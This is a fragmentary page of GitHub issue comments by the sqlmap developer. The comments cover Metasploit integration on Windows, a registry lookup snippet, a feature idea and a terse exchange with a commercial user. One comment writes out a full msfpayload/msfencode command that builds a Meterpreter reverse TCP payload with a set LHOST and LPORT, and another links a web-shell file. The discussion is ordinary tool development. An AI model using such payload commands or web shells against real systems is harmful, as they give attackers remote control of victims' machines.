Miroslav Stampar
Miroslav Stampar
@tylercamp looking into "Code Dx" I can see that you have a nice business case. So basically, you are nagging that your business - where FOSS sqlmap is obviously used...
@tylercamp If you can imagine the scale of priority from 0 to 10, this has fell to -9000 on my list. This basically means that you can tell your executive...
Sample run: C:\metasploit>scripts\setenv.bat C:\metasploit\msf3>ruby msfpayload
Sample generic one-liner run: ``` \scripts\setenv.bat & ruby \msf3\msfpayload ```
Installation directory registry location: ``` "HKEY_LOCAL_MACHINE"\"SOFTWARE\Rapid7\Metasploit"\"Location" ```
``` import subprocess IS_WIN = subprocess.mswindows def _(key, value): retVal = None if IS_WIN: try: from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) _ = OpenKey(_, key)...
Just for further reference for commands/forms which need to be supported: ``` /usr/local/bin/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 R | /usr/local/bin/msfencode -a x86 -e x86/alpha_mixed -o /home/stamparm/Dropbox/Work/sqlmap/output/192.168.21.129/tmpmcaro -t raw BufferRegister=EAX /usr/local/bin/msfcli...
Not a bad idea, but: 1) Who would use it? 2) How to use it in as-easy way as possible? --- For example, `--sessions=... File containing multiple session cookies`. You...
Another reference: https://github.com/danielmiessler/SecLists/blob/master/Web-Shells/laudanum-0.8/cfm/shell.cfm
https://github.com/rapid7/metasploit-framework/pull/976